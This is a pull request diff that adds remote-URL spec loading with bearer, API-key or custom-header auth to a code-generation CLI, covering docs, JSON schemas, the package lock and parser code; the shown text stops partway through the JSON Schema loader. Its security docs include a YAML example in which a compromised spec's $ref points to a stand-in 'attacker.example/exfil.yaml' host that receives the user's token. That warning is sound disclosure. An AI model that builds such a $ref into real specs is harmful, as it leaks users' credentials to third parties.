### PR TITLE
feat: add remote URL support for input specifications with optional auth

### DIFF
--- a/docs/configurations.md
+++ b/docs/configurations.md
@@ -127,3 +127,106 @@ export default {
   ]
 };
 ```
+
+## Remote URL inputs
+
+`inputPath` accepts an `http://` or `https://` URL in addition to a local
+file path. The same configuration field is used for AsyncAPI, OpenAPI, and
+JSON Schema inputs:
+
+```javascript
+export default {
+  inputType: 'asyncapi',
+  inputPath: 'https://example.com/specs/asyncapi.yaml',
+  language: 'typescript',
+  generators: [
+    { preset: 'payloads', outputPath: './src/payloads' }
+  ]
+};
+```
+
+Format detection prefers the response `Content-Type` header
+(`application/json` → JSON, `*yaml*` → YAML), falling back to the URL
+extension and finally to JSON-then-YAML for ambiguous cases.
+
+External `$ref` targets (e.g. `$ref:
+'https://example.com/components.yaml#/components/schemas/Pet'`) are also
+resolved over the same code path for AsyncAPI and OpenAPI inputs.
+
+### Authenticating remote requests
+
+For specs hosted behind authentication, configure the `auth` field. Three
+shapes are supported:
+
+```javascript
+// Bearer token
+auth: { type: 'bearer', token: process.env.API_TOKEN }
+
+// API key in a custom header
+auth: { type: 'apiKey', header: 'X-API-Key', value: process.env.API_KEY }
+
+// Arbitrary headers
+auth: {
+  type: 'custom',
+  headers: {
+    Authorization: `Bearer ${process.env.API_TOKEN}`,
+    'X-Tenant': 'acme'
+  }
+}
+```
+
+The `auth` field is ignored when `inputPath` is a local file path.
+
+### Auth scope and security considerations
+
+**The configured authentication headers are sent to every URL the loader
+fetches**, including:
+
+- The root `inputPath` URL.
+- Every external `$ref` target the parser libraries follow during
+  dereferencing — even when the `$ref` points at a different host.
+
+This is the right default for typical internal-SSO setups where the root
+spec and its `$ref` chain share an auth boundary, but it means that **a
+compromised spec can exfiltrate your token**:
+
+```yaml
+# Compromised spec at https://api.example.com/openapi.yaml
+openapi: 3.0.0
+paths:
+  /users:
+    get:
+      responses:
+        '200':
+          content:
+            application/json:
+              schema:
+                $ref: 'https://attacker.example/exfil.yaml'   # ← receives your token
+```
+
+**Mitigations shipped today** (no extra config required):
+
+1. **Per-URL debug log** — every fetched URL is logged at `debug` level
+   (`[remote-fetch] GET <url>`). With `--logLevel debug` you can audit
+   exactly which hosts received your auth.
+2. **Cross-host info-level warning** — when a `$ref` points at a host
+   different from the root `inputPath`'s host, an `info` log is emitted
+   once per distinct cross-host destination:
+   `[remote-fetch] auth headers sent to '<host>' while resolving $ref
+   from '<root-host>'. If this is unexpected, review the spec.`
+3. **Schema-level warning** — the `auth` field's JSON schema description
+   carries the security warning so it shows in IDE tooltips and
+   schema-driven autocomplete.
+
+**Deferred to follow-up issues:**
+
+- Per-host auth maps (e.g. `auth: { 'api.acme.com': { type: 'bearer', ... } }`).
+- Auth-host allowlist (only send auth to listed hosts).
+- Disabling external `$ref` resolution entirely.
+
+### Watch mode
+
+`--watch` only observes the local filesystem. When `inputPath` is a
+remote URL, the input watcher is skipped and a warning is logged. Use
+`--watchPath` to watch a local file that triggers regeneration (which
+will re-fetch the URL) on change.

--- a/docs/configurations.md
+++ b/docs/configurations.md
@@ -204,26 +204,6 @@ paths:
                 $ref: 'https://attacker.example/exfil.yaml'   # ← receives your token
 ```
 
-**Mitigations shipped today** (no extra config required):
-
-1. **Per-URL debug log** — every fetched URL is logged at `debug` level
-   (`[remote-fetch] GET <url>`). With `--logLevel debug` you can audit
-   exactly which hosts received your auth.
-2. **Cross-host info-level warning** — when a `$ref` points at a host
-   different from the root `inputPath`'s host, an `info` log is emitted
-   once per distinct cross-host destination:
-   `[remote-fetch] auth headers sent to '<host>' while resolving $ref
-   from '<root-host>'. If this is unexpected, review the spec.`
-3. **Schema-level warning** — the `auth` field's JSON schema description
-   carries the security warning so it shows in IDE tooltips and
-   schema-driven autocomplete.
-
-**Deferred to follow-up issues:**
-
-- Per-host auth maps (e.g. `auth: { 'api.acme.com': { type: 'bearer', ... } }`).
-- Auth-host allowlist (only send auth to listed hosts).
-- Disabling external `$ref` resolution entirely.
-
 ### Watch mode
 
 `--watch` only observes the local filesystem. When `inputPath` is a

--- a/docs/inputs/asyncapi.md
+++ b/docs/inputs/asyncapi.md
@@ -28,14 +28,9 @@ There is a lot of overlap with existing tooling, however the idea is to form the
 
 ## Remote URL inputs
 
-`inputPath` accepts an `http://` or `https://` URL. Optional
-authentication (bearer token, API key, or custom headers) is configured
-via the `auth` field. See the [configurations
-guide](../configurations.md#remote-url-inputs) for examples and the
-[auth scope and security
-considerations](../configurations.md#auth-scope-and-security-considerations)
-section before using `auth` against a public spec — the configured
-headers are sent to every `$ref` target as well as the root URL.
+`inputPath` accepts an `http://` or `https://` URL. Optional authentication (bearer token, API key, or custom headers) is configured
+via the `auth` field. See the [configurations guide](../configurations.md#remote-url-inputs) for examples and the [auth scope and security
+considerations](../configurations.md#auth-scope-and-security-considerations) section before using `auth` against a public spec — the configured headers are sent to every `$ref` target as well as the root URL.
 
 ## Basic AsyncAPI Document Structure
 

--- a/docs/inputs/asyncapi.md
+++ b/docs/inputs/asyncapi.md
@@ -26,6 +26,17 @@ There is a lot of overlap with existing tooling, however the idea is to form the
 | [`custom`](../generators/custom.md) | ✅ |
 | [`models`](../generators/custom.md) | ✅ |
 
+## Remote URL inputs
+
+`inputPath` accepts an `http://` or `https://` URL. Optional
+authentication (bearer token, API key, or custom headers) is configured
+via the `auth` field. See the [configurations
+guide](../configurations.md#remote-url-inputs) for examples and the
+[auth scope and security
+considerations](../configurations.md#auth-scope-and-security-considerations)
+section before using `auth` against a public spec — the configured
+headers are sent to every `$ref` target as well as the root URL.
+
 ## Basic AsyncAPI Document Structure
 
 Here's a complete basic AsyncAPI document example to get you started:

--- a/docs/inputs/jsonschema.md
+++ b/docs/inputs/jsonschema.md
@@ -17,15 +17,7 @@ The JSON Schema input type supports the following generators:
 
 ## Remote URL inputs
 
-`inputPath` accepts an `http://` or `https://` URL. Optional
-authentication (bearer token, API key, or custom headers) is configured
-via the `auth` field. See the [configurations
-guide](../configurations.md#remote-url-inputs) for examples and the
-[auth scope and security
-considerations](../configurations.md#auth-scope-and-security-considerations)
-section. Note: JSON Schema input does **not** resolve external `$ref`s
-in the loader (Modelina handles refs downstream), so auth headers are
-only sent to the root URL.
+`inputPath` accepts an `http://` or `https://` URL. Optional authentication (bearer token, API key, or custom headers) is configured via the `auth` field. See the [configurations guide](../configurations.md#remote-url-inputs) for examples and the [auth scope and security considerations](../configurations.md#auth-scope-and-security-considerations) section. Note: JSON Schema input does **not** resolve external `$ref`s in the loader (Modelina handles refs downstream), so auth headers are only sent to the root URL.
 
 ## Configuration
 

--- a/docs/inputs/jsonschema.md
+++ b/docs/inputs/jsonschema.md
@@ -15,6 +15,18 @@ The JSON Schema input type supports the following generators:
 | [`models`](../generators/models.md) | ✅ |
 | [`custom`](../generators/custom.md) | ✅ |
 
+## Remote URL inputs
+
+`inputPath` accepts an `http://` or `https://` URL. Optional
+authentication (bearer token, API key, or custom headers) is configured
+via the `auth` field. See the [configurations
+guide](../configurations.md#remote-url-inputs) for examples and the
+[auth scope and security
+considerations](../configurations.md#auth-scope-and-security-considerations)
+section. Note: JSON Schema input does **not** resolve external `$ref`s
+in the loader (Modelina handles refs downstream), so auth headers are
+only sent to the root URL.
+
 ## Configuration
 
 ### Basic Configuration

--- a/docs/inputs/openapi.md
+++ b/docs/inputs/openapi.md
@@ -36,6 +36,18 @@ Create a configuration file that specifies OpenAPI as the input type:
 }
 ```
 
+## Remote URL inputs
+
+`inputPath` accepts an `http://` or `https://` URL. Optional
+authentication (bearer token, API key, or custom headers) is configured
+via the `auth` field. Cross-spec `$ref` URLs are also resolved through
+the same auth-aware HTTP client. See the [configurations
+guide](../configurations.md#remote-url-inputs) for examples and the
+[auth scope and security
+considerations](../configurations.md#auth-scope-and-security-considerations)
+section — the configured headers are sent to every `$ref` target as
+well as the root URL.
+
 ## Advanced Features
 
 ### External References

--- a/docs/inputs/openapi.md
+++ b/docs/inputs/openapi.md
@@ -38,39 +38,7 @@ Create a configuration file that specifies OpenAPI as the input type:
 
 ## Remote URL inputs
 
-`inputPath` accepts an `http://` or `https://` URL. Optional
-authentication (bearer token, API key, or custom headers) is configured
-via the `auth` field. Cross-spec `$ref` URLs are also resolved through
-the same auth-aware HTTP client. See the [configurations
-guide](../configurations.md#remote-url-inputs) for examples and the
-[auth scope and security
-considerations](../configurations.md#auth-scope-and-security-considerations)
-section — the configured headers are sent to every `$ref` target as
-well as the root URL.
-
-## Advanced Features
-
-### External References
-
-The OpenAPI parser automatically resolves external `$ref` references:
-
-```yaml
-components:
-  schemas:
-    Pet:
-      $ref: './schemas/pet.yaml#/Pet'
-    User:
-      $ref: 'https://api.example.com/schemas/user.json#/User'
-```
-
-### OpenAPI 3.1 Features
-
-Full support for OpenAPI 3.1 features including:
-
-- JSON Schema 2020-12 compatibility
-- `const` keyword
-- `if`/`then`/`else` conditionals
-- Enhanced `examples` support
+`inputPath` accepts an `http://` or `https://` URL. Optional authentication (bearer token, API key, or custom headers) is configured via the `auth` field. Cross-spec `$ref` URLs are also resolved through the same auth-aware HTTP client. See the [configurations guide](../configurations.md#remote-url-inputs) for examples and the [auth scope and security considerations](../configurations.md#auth-scope-and-security-considerations) section — the configured headers are sent to every `$ref` target as well as the root URL.
 
 ## Troubleshooting
 

--- a/package-lock.json
+++ b/package-lock.json
@@ -9,6 +9,7 @@
       "version": "0.71.0",
       "license": "Apache-2.0",
       "dependencies": {
+        "@apidevtools/json-schema-ref-parser": "^14.2.0",
         "@asyncapi/avro-schema-parser": "^3.0.24",
         "@asyncapi/modelina": "^6.0.0-next.11",
         "@asyncapi/openapi-schema-parser": "^3.0.24",
@@ -43,7 +44,7 @@
         "@swc/jest": "^0.2.23",
         "@types/inquirer": "^9.0.7",
         "@types/jest": "^29.5.12",
-        "@types/node": "^18",
+        "@types/node": "^22",
         "@types/rimraf": "^4.0.5",
         "@types/uuid": "^10.0.0",
         "@typescript-eslint/eslint-plugin": "^8.58.0",
@@ -89,19 +90,21 @@
       }
     },
     "node_modules/@apidevtools/json-schema-ref-parser": {
-      "version": "11.6.4",
-      "resolved": "https://registry.npmjs.org/@apidevtools/json-schema-ref-parser/-/json-schema-ref-parser-11.6.4.tgz",
-      "integrity": "sha512-9K6xOqeevacvweLGik6LnZCb1fBtCOSIWQs8d096XGeqoLKC33UVMGz9+77Gw44KvbH4pKcQPWo4ZpxkXYj05w==",
+      "version": "14.2.1",
+      "resolved": "https://registry.npmjs.org/@apidevtools/json-schema-ref-parser/-/json-schema-ref-parser-14.2.1.tgz",
+      "integrity": "sha512-HmdFw9CDYqM6B25pqGBpNeLCKvGPlIx1EbLrVL0zPvj50CJQUHyBNBw45Muk0kEIkogo1VZvOKHajdMuAzSxRg==",
+      "license": "MIT",
       "dependencies": {
-        "@jsdevtools/ono": "^7.1.3",
-        "@types/json-schema": "^7.0.15",
         "js-yaml": "^4.1.0"
       },
       "engines": {
-        "node": ">= 16"
+        "node": ">= 20"
       },
       "funding": {
         "url": "https://github.com/sponsors/philsturgeon"
+      },
+      "peerDependencies": {
+        "@types/json-schema": "^7.0.15"
       }
     },
     "node_modules/@apidevtools/openapi-schemas": {
@@ -194,6 +197,23 @@
       },
       "engines": {
         "node": ">=22"
+      }
+    },
+    "node_modules/@asyncapi/modelina/node_modules/@apidevtools/json-schema-ref-parser": {
+      "version": "11.9.3",
+      "resolved": "https://registry.npmjs.org/@apidevtools/json-schema-ref-parser/-/json-schema-ref-parser-11.9.3.tgz",
+      "integrity": "sha512-60vepv88RwcJtSHrD6MjIL6Ta3SOYbgfnkHb+ppAVK+o9mXprRtulx7VlRl3lN3bbvysAfCS7WMVfhUYemB0IQ==",
+      "license": "MIT",
+      "dependencies": {
+        "@jsdevtools/ono": "^7.1.3",
+        "@types/json-schema": "^7.0.15",
+        "js-yaml": "^4.1.0"
+      },
+      "engines": {
+        "node": ">= 16"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/philsturgeon"
       }
     },
     "node_modules/@asyncapi/modelina/node_modules/change-case": {
@@ -3824,24 +3844,6 @@
         "openapi-types": ">=7"
       }
     },
-    "node_modules/@readme/openapi-parser/node_modules/@apidevtools/json-schema-ref-parser": {
-      "version": "14.2.0",
-      "resolved": "https://registry.npmjs.org/@apidevtools/json-schema-ref-parser/-/json-schema-ref-parser-14.2.0.tgz",
-      "integrity": "sha512-NaGMMWwppbByagq+LwQMq6PMXHFWVu6kSwwx+eJfYTJ5zdpOvb9TIk6ZWxEEeXMUvGdVOZq3JalYsjsTZDvtkA==",
-      "license": "MIT",
-      "dependencies": {
-        "js-yaml": "^4.1.0"
-      },
-      "engines": {
-        "node": ">= 20"
-      },
-      "funding": {
-        "url": "https://github.com/sponsors/philsturgeon"
-      },
-      "peerDependencies": {
-        "@types/json-schema": "^7.0.15"
-      }
-    },
     "node_modules/@readme/openapi-schemas": {
       "version": "3.1.0",
       "resolved": "https://registry.npmjs.org/@readme/openapi-schemas/-/openapi-schemas-3.1.0.tgz",
@@ -5627,12 +5629,19 @@
       }
     },
     "node_modules/@types/node": {
-      "version": "18.19.33",
-      "resolved": "https://registry.npmjs.org/@types/node/-/node-18.19.33.tgz",
-      "integrity": "sha512-NR9+KrpSajr2qBVp/Yt5TU/rp+b5Mayi3+OlMlcg2cVCfRmcG5PWZ7S4+MG9PZ5gWBoc9Pd0BKSRViuBCRPu0A==",
+      "version": "22.19.17",
+      "resolved": "https://registry.npmjs.org/@types/node/-/node-22.19.17.tgz",
+      "integrity": "sha512-wGdMcf+vPYM6jikpS/qhg6WiqSV/OhG+jeeHT/KlVqxYfD40iYJf9/AE1uQxVWFvU7MipKRkRv8NSHiCGgPr8Q==",
+      "license": "MIT",
       "dependencies": {
-        "undici-types": "~5.26.4"
+        "undici-types": "~6.21.0"
       }
+    },
+    "node_modules/@types/node/node_modules/undici-types": {
+      "version": "6.21.0",
+      "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz",
+      "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==",
+      "license": "MIT"
     },
     "node_modules/@types/protocol-buffers-schema": {
       "version": "3.4.3",
@@ -15118,7 +15127,8 @@
     "node_modules/undici-types": {
       "version": "5.26.5",
       "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz",
-      "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA=="
+      "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==",
+      "dev": true
     },
     "node_modules/universalify": {
       "version": "0.1.2",

--- a/package.json
+++ b/package.json
@@ -7,6 +7,7 @@
   },
   "bugs": "https://github.com/the-codegen-project/cli/issues",
   "dependencies": {
+    "@apidevtools/json-schema-ref-parser": "^14.2.0",
     "@asyncapi/avro-schema-parser": "^3.0.24",
     "@asyncapi/modelina": "^6.0.0-next.11",
     "@asyncapi/openapi-schema-parser": "^3.0.24",
@@ -38,7 +39,7 @@
     "@swc/jest": "^0.2.23",
     "@types/inquirer": "^9.0.7",
     "@types/jest": "^29.5.12",
-    "@types/node": "^18",
+    "@types/node": "^22",
     "@types/rimraf": "^4.0.5",
     "@types/uuid": "^10.0.0",
     "@typescript-eslint/eslint-plugin": "^8.58.0",

--- a/schemas/configuration-schema-0-with-docs.json
+++ b/schemas/configuration-schema-0-with-docs.json
@@ -19,6 +19,9 @@
                     "type": "string",
                     "markdownDescription": "Path or URL to the input document used as the source for code generation. [Read more about configurations here](https://the-codegen-project.org/docs/configurations)"
                 },
+                "auth": {
+                    "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/auth"
+                },
                 "language": {
                     "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/language"
                 },
@@ -78,6 +81,9 @@
                     "type": "string",
                     "markdownDescription": "Path or URL to the input document used as the source for code generation. [Read more about configurations here](https://the-codegen-project.org/docs/configurations)"
                 },
+                "auth": {
+                    "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/auth"
+                },
                 "language": {
                     "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/language"
                 },
@@ -123,6 +129,72 @@
                 "inputPath": {
                     "type": "string",
                     "markdownDescription": "Path or URL to the input document used as the source for code generation. [Read more about configurations here](https://the-codegen-project.org/docs/configurations)"
+                },
+                "auth": {
+                    "anyOf": [
+                        {
+                            "type": "object",
+                            "properties": {
+                                "type": {
+                                    "type": "string",
+                                    "const": "bearer"
+                                },
+                                "token": {
+                                    "type": "string",
+                                    "minLength": 1
+                                }
+                            },
+                            "required": [
+                                "type",
+                                "token"
+                            ],
+                            "additionalProperties": false
+                        },
+                        {
+                            "type": "object",
+                            "properties": {
+                                "type": {
+                                    "type": "string",
+                                    "const": "apiKey"
+                                },
+                                "header": {
+                                    "type": "string",
+                                    "minLength": 1
+                                },
+                                "value": {
+                                    "type": "string",
+                                    "minLength": 1
+                                }
+                            },
+                            "required": [
+                                "type",
+                                "header",
+                                "value"
+                            ],
+                            "additionalProperties": false
+                        },
+                        {
+                            "type": "object",
+                            "properties": {
+                                "type": {
+                                    "type": "string",
+                                    "const": "custom"
+                                },
+                                "headers": {
+                                    "type": "object",
+                                    "additionalProperties": {
+                                        "type": "string"
+                                    }
+                                }
+                            },
+                            "required": [
+                                "type",
+                                "headers"
+                            ],
+                            "additionalProperties": false
+                        }
+                    ],
+                    "markdownDescription": "Authentication for fetching remote input specifications via http(s). Ignored for local file paths. WARNING: these credentials are sent to every URL the loader fetches, including external $ref targets on other hosts. See https://the-codegen-project.org/docs/configurations#auth-scope-and-security-considerations for details."
                 },
                 "language": {
                     "type": "string",

--- a/schemas/configuration-schema-0.json
+++ b/schemas/configuration-schema-0.json
@@ -19,6 +19,9 @@
                     "type": "string",
                     "description": "Path or URL to the input document used as the source for code generation. Read more about configurations here"
                 },
+                "auth": {
+                    "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/auth"
+                },
                 "language": {
                     "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/language"
                 },
@@ -78,6 +81,9 @@
                     "type": "string",
                     "description": "Path or URL to the input document used as the source for code generation. Read more about configurations here"
                 },
+                "auth": {
+                    "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/auth"
+                },
                 "language": {
                     "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/language"
                 },
@@ -123,6 +129,72 @@
                 "inputPath": {
                     "type": "string",
                     "description": "Path or URL to the input document used as the source for code generation. Read more about configurations here"
+                },
+                "auth": {
+                    "anyOf": [
+                        {
+                            "type": "object",
+                            "properties": {
+                                "type": {
+                                    "type": "string",
+                                    "const": "bearer"
+                                },
+                                "token": {
+                                    "type": "string",
+                                    "minLength": 1
+                                }
+                            },
+                            "required": [
+                                "type",
+                                "token"
+                            ],
+                            "additionalProperties": false
+                        },
+                        {
+                            "type": "object",
+                            "properties": {
+                                "type": {
+                                    "type": "string",
+                                    "const": "apiKey"
+                                },
+                                "header": {
+                                    "type": "string",
+                                    "minLength": 1
+                                },
+                                "value": {
+                                    "type": "string",
+                                    "minLength": 1
+                                }
+                            },
+                            "required": [
+                                "type",
+                                "header",
+                                "value"
+                            ],
+                            "additionalProperties": false
+                        },
+                        {
+                            "type": "object",
+                            "properties": {
+                                "type": {
+                                    "type": "string",
+                                    "const": "custom"
+                                },
+                                "headers": {
+                                    "type": "object",
+                                    "additionalProperties": {
+                                        "type": "string"
+                                    }
+                                }
+                            },
+                            "required": [
+                                "type",
+                                "headers"
+                            ],
+                            "additionalProperties": false
+                        }
+                    ],
+                    "description": "Authentication for fetching remote input specifications via http(s). Ignored for local file paths. WARNING: these credentials are sent to every URL the loader fetches, including external $ref targets on other hosts. See https://the-codegen-project.org/docs/configurations#auth-scope-and-security-considerations for details."
                 },
                 "language": {
                     "type": "string",

--- a/src/codegen/configurations.ts
+++ b/src/codegen/configurations.ts
@@ -41,6 +41,7 @@ import {
   parseZodErrors
 } from './errors';
 import {detectTypeScriptImportExtension} from './detection';
+import {isRemoteUrl} from '../utils/inputSource';
 const moduleName = 'codegen';
 const explorer = cosmiconfig(moduleName, {
   searchPlaces: [
@@ -290,12 +291,15 @@ export async function realizeGeneratorContext(
   }
 
   Logger.debug(`Found configuration: ${JSON.stringify(config, null, 2)}`);
-  const documentPath = path.resolve(path.dirname(filePath), config.inputPath);
+  const documentPath = isRemoteUrl(config.inputPath)
+    ? config.inputPath
+    : path.resolve(path.dirname(filePath), config.inputPath);
   Logger.verbose(`Document path: ${documentPath}`);
   Logger.verbose(`Input type: ${config.inputType}`);
   const context: RunGeneratorContext = {
     configuration: config,
     documentPath,
+    inputAuth: (config as {auth?: RunGeneratorContext['inputAuth']}).auth,
     configFilePath: filePath
   };
   if (config.inputType === 'asyncapi') {

--- a/src/codegen/errors.ts
+++ b/src/codegen/errors.ts
@@ -181,17 +181,106 @@ export function createConfigValidationError(options: {
   });
 }
 
+function detectFormatHint(inputPath: string): 'JSON' | 'YAML' | 'JSON or YAML' {
+  if (inputPath.endsWith('.json')) {
+    return 'JSON';
+  }
+  if (inputPath.endsWith('.yaml') || inputPath.endsWith('.yml')) {
+    return 'YAML';
+  }
+  return 'JSON or YAML';
+}
+
 export function createInputDocumentError(options: {
   inputPath: string;
   inputType: string;
   errorMessage: string;
 }): CodegenError {
   const {inputPath, inputType, errorMessage} = options;
+  const isUrl =
+    inputPath.startsWith('http://') || inputPath.startsWith('https://');
+  const formatHint = detectFormatHint(inputPath);
+  const sourceHelp = isUrl
+    ? `Check that the URL is reachable and returns a valid ${formatHint} document.`
+    : `Check that the input file exists and is a valid ${formatHint} file.`;
   return new CodegenError({
     type: ErrorType.INPUT_DOCUMENT_ERROR,
     message: `Failed to load ${inputType} document: ${inputPath}`,
     details: errorMessage,
-    help: `Check that the input file exists and is a valid ${inputPath.endsWith('.json') ? 'JSON' : 'YAML'} file.\nEnsure the document conforms to the ${inputType} specification.`
+    help: `${sourceHelp}\nEnsure the document conforms to the ${inputType} specification.`
+  });
+}
+
+/**
+ * Build a typed error for a failed remote fetch. Help text is tailored
+ * to the HTTP status code (401/403 → auth, 404 → URL, 429 → rate-limit,
+ * timeout → timeout, network → connectivity, other → generic).
+ */
+function remoteFetchHelp(
+  url: string,
+  reason: 'timeout' | 'network' | 'http' | undefined,
+  status: number | undefined,
+  cause: unknown
+): string {
+  if (reason === 'timeout') {
+    return 'The request timed out. Increase the timeout, retry, or check that the host is reachable.';
+  }
+  if (status === 401 || status === 403) {
+    return `Authentication or authorization failed for ${url}. Check the 'auth' field in your configuration (token, header name, header value).`;
+  }
+  if (status === 404) {
+    return `The URL ${url} returned 404. Verify the URL is correct and the resource exists.`;
+  }
+  if (status === 429) {
+    return `The server is rate-limiting requests to ${url}. Retry later or reduce the request rate.`;
+  }
+  if (status && status >= 500) {
+    return `The server returned a ${status} error for ${url}. The remote service may be temporarily unavailable; retry later.`;
+  }
+  if (reason === 'network' || (!status && cause)) {
+    return `Could not reach ${url}. Check your network connection, DNS, and any firewall/proxy settings.`;
+  }
+  return `Could not fetch ${url}.`;
+}
+
+function formatStatusPart(
+  status: number | undefined,
+  statusText: string | undefined
+): string {
+  if (!status) {
+    return '';
+  }
+  const trailing = statusText ? ` ${statusText}` : '';
+  return ` (HTTP ${status}${trailing})`;
+}
+
+function stringifyCause(cause: unknown): string {
+  if (cause instanceof Error) {
+    return cause.message;
+  }
+  if (cause === undefined) {
+    return '';
+  }
+  return String(cause);
+}
+
+export function createRemoteFetchError(options: {
+  url: string;
+  status?: number;
+  statusText?: string;
+  cause?: unknown;
+  reason?: 'timeout' | 'network' | 'http';
+}): CodegenError {
+  const {url, status, statusText, cause, reason} = options;
+  const help = remoteFetchHelp(url, reason, status, cause);
+  const statusPart = formatStatusPart(status, statusText);
+  const causePart = stringifyCause(cause);
+
+  return new CodegenError({
+    type: ErrorType.INPUT_DOCUMENT_ERROR,
+    message: `Failed to fetch remote document from ${url}${statusPart}`,
+    details: causePart || undefined,
+    help
   });
 }
 

--- a/src/codegen/inputs/asyncapi/parser.ts
+++ b/src/codegen/inputs/asyncapi/parser.ts
@@ -1,13 +1,17 @@
-import {Parser, fromFile} from '@asyncapi/parser';
+import {Parser} from '@asyncapi/parser';
 import {AvroSchemaParser} from '@asyncapi/avro-schema-parser';
 import {OpenAPISchemaParser} from '@asyncapi/openapi-schema-parser';
 import {RamlDTSchemaParser} from '@asyncapi/raml-dt-schema-parser';
 import {ProtoBuffSchemaParser} from '@asyncapi/protobuf-schema-parser';
-import {RunGeneratorContext} from '../../types';
+import {readFileSync} from 'fs';
+import {InputAuthConfig, RunGeneratorContext} from '../../types';
 import {Logger} from '../../../LoggingInterface';
 import {createInputDocumentError} from '../../errors';
+import {isRemoteUrl} from '../../../utils/inputSource';
+import {fetchRemoteDocument} from '../../../utils/remoteFetch';
+import {createAsyncapiResolvers} from '../../../utils/refResolvers';
 
-const parser = new Parser({
+const SHARED_PARSER_OPTIONS = {
   ruleset: {
     core: false,
     recommended: false
@@ -18,15 +22,55 @@ const parser = new Parser({
     RamlDTSchemaParser(),
     ProtoBuffSchemaParser()
   ]
-});
+};
 
-export async function loadAsyncapi(context: RunGeneratorContext) {
-  return loadAsyncapiDocument(context.documentPath);
+const sharedParser = new Parser({...SHARED_PARSER_OPTIONS});
+
+function buildParserWithAuth(auth: InputAuthConfig, rootUrl: string): Parser {
+  return new Parser({
+    ...SHARED_PARSER_OPTIONS,
+    __unstable: {
+      resolver: {
+        // The resolver shape comes from `@stoplight/spectral-ref-resolver`
+        // and accepts `string | undefined | Promise<string | undefined>`.
+        // Our resolver factory always returns a string.
+        resolvers: createAsyncapiResolvers(auth, {rootUrl}) as any
+      }
+    }
+  });
 }
 
-export async function loadAsyncapiDocument(documentPath: string) {
+export async function loadAsyncapi(context: RunGeneratorContext) {
+  return loadAsyncapiDocument(context.documentPath, context.inputAuth);
+}
+
+export async function loadAsyncapiDocument(
+  documentPath: string,
+  auth?: InputAuthConfig
+) {
   Logger.verbose(`Loading AsyncAPI document from ${documentPath}`);
-  const document = await fromFile(parser, documentPath).parse();
+  let content: string;
+  if (isRemoteUrl(documentPath)) {
+    const fetched = await fetchRemoteDocument(documentPath, auth);
+    content = fetched.content;
+  } else {
+    try {
+      content = readFileSync(documentPath, 'utf-8');
+    } catch (error) {
+      throw createInputDocumentError({
+        inputPath: documentPath,
+        inputType: 'asyncapi',
+        errorMessage: `Could not read file: ${error}`
+      });
+    }
+  }
+
+  const parser =
+    isRemoteUrl(documentPath) && auth
+      ? buildParserWithAuth(auth, documentPath)
+      : sharedParser;
+
+  const document = await parser.parse(content, {source: documentPath});
   if (document.diagnostics.length > 0) {
     throw createInputDocumentError({
       inputPath: documentPath,
@@ -39,7 +83,7 @@ export async function loadAsyncapiDocument(documentPath: string) {
 }
 
 export async function loadAsyncapiFromMemory(input: string) {
-  const document = await parser.parse(input);
+  const document = await sharedParser.parse(input);
   if (document.diagnostics.length > 0) {
     throw createInputDocumentError({
       inputPath: 'memory',

--- a/src/codegen/inputs/jsonschema/parser.ts
+++ b/src/codegen/inputs/jsonschema/parser.ts
@@ -1,7 +1,10 @@
 import {Logger} from '../../../LoggingInterface';
-import {RunGeneratorContext} from '../../types';
+import {InputAuthConfig, RunGeneratorContext} from '../../types';
 import fs from 'fs';
+import {parse as parseYaml} from 'yaml';
 import {createInputDocumentError} from '../../errors';
+import {isRemoteUrl} from '../../../utils/inputSource';
+import {fetchRemoteDocument} from '../../../utils/remoteFetch';
 
 export interface JsonSchemaDocument {
   [key: string]: any;
@@ -13,82 +16,57 @@ export interface JsonSchemaDocument {
 }
 
 /**
- * Load JSON Schema document from file path in context
+ * Load JSON Schema document from file path or remote URL in context.
  */
 export async function loadJsonSchema(
   context: RunGeneratorContext
 ): Promise<JsonSchemaDocument> {
-  const {documentPath} = context;
-  Logger.verbose(`Loading JSON Schema document from ${documentPath}`);
-
-  try {
-    const fileContent = fs.readFileSync(documentPath, 'utf8');
-    let document: JsonSchemaDocument;
-
-    if (documentPath.endsWith('.json')) {
-      document = JSON.parse(fileContent);
-    } else if (
-      documentPath.endsWith('.yaml') ||
-      documentPath.endsWith('.yml')
-    ) {
-      // Import yaml dynamically to avoid circular dependencies
-      const yaml = await import('yaml');
-      document = yaml.parse(fileContent);
-    } else {
-      throw createInputDocumentError({
-        inputPath: documentPath,
-        inputType: 'jsonschema',
-        errorMessage: `Unsupported file format. Use .json, .yaml, or .yml`
-      });
-    }
-
-    validateJsonSchemaDocument(document, documentPath);
-    return document;
-  } catch (error) {
-    if (error instanceof Error) {
-      throw createInputDocumentError({
-        inputPath: documentPath,
-        inputType: 'jsonschema',
-        errorMessage: error.message
-      });
-    }
-    throw createInputDocumentError({
-      inputPath: documentPath,
-      inputType: 'jsonschema',
-      errorMessage: 'Unknown error'
-    });
-  }
+  return loadJsonSchemaDocument(context.documentPath, context.inputAuth);
 }
 
 /**
- * Load JSON Schema document from file path directly
+ * Load JSON Schema document from a file path or http(s) URL.
+ *
+ * URL format detection: prefers `Content-Type` (`application/json` →
+ * JSON, `*yaml*` → YAML), falls back to URL extension, then to
+ * JSON-first-then-YAML for ambiguous cases.
  */
 export async function loadJsonSchemaDocument(
-  filePath: string
+  filePath: string,
+  auth?: InputAuthConfig
 ): Promise<JsonSchemaDocument> {
   Logger.verbose(`Loading JSON Schema document from ${filePath}`);
 
   try {
-    const fileContent = fs.readFileSync(filePath, 'utf8');
